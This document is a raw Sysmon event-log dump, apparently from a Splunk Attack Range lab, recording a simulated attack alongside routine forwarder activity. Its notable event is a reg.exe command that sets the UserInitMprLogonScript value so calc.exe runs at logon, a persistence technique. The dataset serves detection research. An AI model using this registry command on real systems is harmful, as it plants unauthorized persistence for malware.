09:25:48.834{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057297Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:48.834{5EBD8912-8D2A-6151-9600-00000000FD01}46323736C:\Windows\Explorer.EXE{5EBD8912-8E1C-6151-C800-00000000FD01}3608C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+a909f|C:\Windows\System32\windows.storage.dll+a8d15|C:\Windows\System32\windows.storage.dll+a8806|C:\Windows\System32\windows.storage.dll+a9c78|C:\Windows\System32\windows.storage.dll+a862e|C:\Windows\System32\windows.storage.dll+ab445|C:\Windows\System32\windows.storage.dll+ab7c4|C:\Windows\System32\windows.storage.dll+aae00|C:\Windows\System32\windows.storage.dll+ad62a|C:\Windows\System32\windows.storage.dll+ad3e2|C:\Windows\System32\SHELL32.dll+3f8bd|C:\Windows\System32\SHELL32.dll+3e456|C:\Windows\System32\SHELL32.dll+801d1|C:\Windows\System32\SHELL32.dll+6716e|C:\Windows\System32\SHELL32.dll+3d433|C:\Windows\System32\SHELL32.dll+3d2fb|C:\Windows\System32\SHELL32.dll+3cc17|C:\Windows\System32\SHELL32.dll+3c8dc|C:\Windows\System32\SHELL32.dll+e2157|C:\Windows\System32\SHELL32.dll+e20b5 154100x80000000000000001057296Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:48.845{5EBD8912-8E1C-6151-C800-00000000FD01}3608C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" C:\Users\Administrator\ATTACKRANGE\Administrator{5EBD8912-8D28-6151-085E-080000000000}0x85e082HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 23542300x80000000000000001057295Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:48.318{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0ADB7039A469A072ABA76448DA3059FC,SHA256=84321A1B637713F5532B830A45BDE9A28D949BB1507A2624A3C6C87729ED2FAE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981701Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:48.216{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8412294822F530110CEB76E56E438B0C,SHA256=C711A9E807CAE309C903FDE8276D514D107562F47891A99C95288E3C80B5F813,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057323Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:49.896{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CBBEC71AE522E59113A28A9D99FBEDE8,SHA256=B0CEF9AE09664B7B1D84AEC687570C417EB3A9BAD7228C94A024A8AE2919AFBB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057322Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:49.896{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C16C689613082D036450D8B32FA5A666,SHA256=79DB32A9D554916846EA7B099E3735F539AF5D823761FC48C7F1243A325BE00C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057321Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:48.168{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54286-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001057320Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:49.334{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7562AE805DBA4EBDCF1B6A18A5DF55A8,SHA256=20D061118C35CCAE801C3DC76336DA251AD602ACBF2A9A326A496E1CFCD29EDD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981702Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:49.217{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBE9760647BCF56B9E75E1967D8DB214,SHA256=910E2B80027B9F06F5155DFBCE77F00A01E9FA75B68045CF3C13D9DAF8832D88,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057324Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:50.568{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=931D682E1C831BA0EE6760A8E196A91C,SHA256=878688FA9AA28D078B0C29A49794DD4854A6F091E749709B0E020670A3148569,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981703Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:50.232{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7E42954DE7ADC222545428B0529F37F,SHA256=55657C491096081661652C7102A5419ECCE336A1602D1514B0F5E7F0FEF2D189,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057327Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:51.740{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C22D220125FE049EB66DB33987D68EA,SHA256=7B39C35AD7323BA93BEC58F1091F2A96C36C8134BC6A9EB4222D9F7F4DEDF928,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981704Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:51.248{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=68C93E73DA9F40C5A6CE00A3601052D2,SHA256=ACF34C00622AA7A6738D5F5F9048BD13460E8A35002472C6A467C6CFC0E7C756,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057326Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:49.208{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-52028-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001057325Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:51.552{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CBBEC71AE522E59113A28A9D99FBEDE8,SHA256=B0CEF9AE09664B7B1D84AEC687570C417EB3A9BAD7228C94A024A8AE2919AFBB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057328Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:52.959{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=742F38903053A8F96741AC176E8D239A,SHA256=02E2F83ACC0FCAB14F9D70DB55E18ED3F24202AEDC9B038865F4E93F6453A65C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981706Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:52.263{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9FDA00B68E55B37CE79592E334419493,SHA256=CE6244CEB4F16A83DE0CD2F991A822EA01221E3FBFE69804F1515F956D1F5981,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981705Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:48.838{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59564-false10.0.1.12-8000- 23542300x8000000000000000981707Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:53.279{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=423B538C241614D9EB49A22B11A3A861,SHA256=604D300E4B56580EF173EBAFAC90E5E2F636C58061BBA973F072316C87A7CE3F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981708Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:54.279{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90F96656FD56E34EC191AA0BC0F3DCFB,SHA256=6EAAFB31E52BD52E8F1A65B13AEF879F73887D33CF4FF8E25A886C16B6D3DB26,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057329Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:54.069{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71A48362576690B7BE81FF8E2818C457,SHA256=1624849827CE3427663695A7A909E420DB4CD2A2E1F50744C93A0FE9A5DD8A5D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981709Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:55.295{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92F57ADF567B69F82049B5A25615266F,SHA256=47F34BA167921600C2485BA2169436EA94F6CA1A2B3984B28FA6FBE0F2D18218,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057330Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:55.099{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4232DCA2CD3A4A9A1A4ADFB00E7E7C0F,SHA256=375DC04E504DAAACB52D6A93FF05B01E9497F6C9D580471DDCEDDF9D31E22134,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981710Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:56.310{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB5B94058B6E816CC9D45A613C2AAD38,SHA256=64C8DF8A6AD288779509600F006467C290650823753E4F52ADE075AE386AD61F,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001057341Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:25:56.849{5EBD8912-8E24-6151-CA00-00000000FD01}4900C:\Windows\system32\reg.exeHKU\S-1-5-21-2741910449-3045839080-4200281267-500\Environment\UserInitMprLogonScriptC:\Windows\System32\calc.exe 10341000x80000000000000001057340Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:56.849{5EBD8912-8E1C-6151-C900-00000000FD01}16725488C:\Windows\system32\conhost.exe{5EBD8912-8E24-6151-CA00-00000000FD01}4900C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057339Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:56.834{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057338Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:56.834{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057337Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:56.834{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057336Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:56.834{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057335Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:56.834{5EBD8912-8D26-6151-8500-00000000FD01}27603956C:\Windows\system32\csrss.exe{5EBD8912-8E24-6151-CA00-00000000FD01}4900C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001057334Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:56.834{5EBD8912-8E1C-6151-C800-00000000FD01}36082268C:\Windows\system32\cmd.exe{5EBD8912-8E24-6151-CA00-00000000FD01}4900C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+1ace3|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001057333Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:56.845{5EBD8912-8E24-6151-CA00-00000000FD01}4900C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add HKCU\Environment /v UserInitMprLogonScript /t REG_SZ /d C:\Windows\System32\calc.exeC:\Users\Administrator\ATTACKRANGE\Administrator{5EBD8912-8D28-6151-085E-080000000000}0x85e082HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{5EBD8912-8E1C-6151-C800-00000000FD01}3608C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" 354300x80000000000000001057332Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:54.151{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54287-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001057331Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:56.131{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB59D4CE68BF3AD567CCCBE8D8BD24C8,SHA256=3C7482A2412555B0B737FB0F6EAC278168A74B3C422018F8F242B8200429AD0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981711Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:57.529{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=611DEC18EB2B6F2995CDB8E668563939,SHA256=44DBF476D18467C998BB4FA920FF268D1C993BB6CF387B00A0C7284921C6988C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057344Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:57.850{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C08D8867A00E3544FA4023F0A2F2DC0D,SHA256=9A88F5E7C040D87EFCDDEC3C40930599AE6160BEEA2A31371CB1E6B2CE53E843,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057343Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:57.850{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=439517C8B433D1D3CD208F356BC17BB2,SHA256=9DCED727B57EAA32A30F7B5E82F228FCC3C14499A8AE5237167BCB4D2E44CCAA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057342Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:57.146{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD81C6D2E9B6DF12E24FEA7EC7E5BF7E,SHA256=C8181750F4C839AE3A5F9B356D9E9F77E7C36CFB0D86CB8875EC1D0D72B0CAA1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981713Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:58.763{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7EFA9078B5230BF67D2FE615CC85A264,SHA256=6EE63664D9874E7BF58D9823BAEE5D566F92CF226A2E704C2FFA4539DCC7728C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001057352Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:58.334{5EBD8912-8D2A-6151-9600-00000000FD01}46324120C:\Windows\Explorer.EXE{5EBD8912-8D80-6151-AF00-00000000FD01}5156C:\Windows\regedit.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62f15|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057351Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 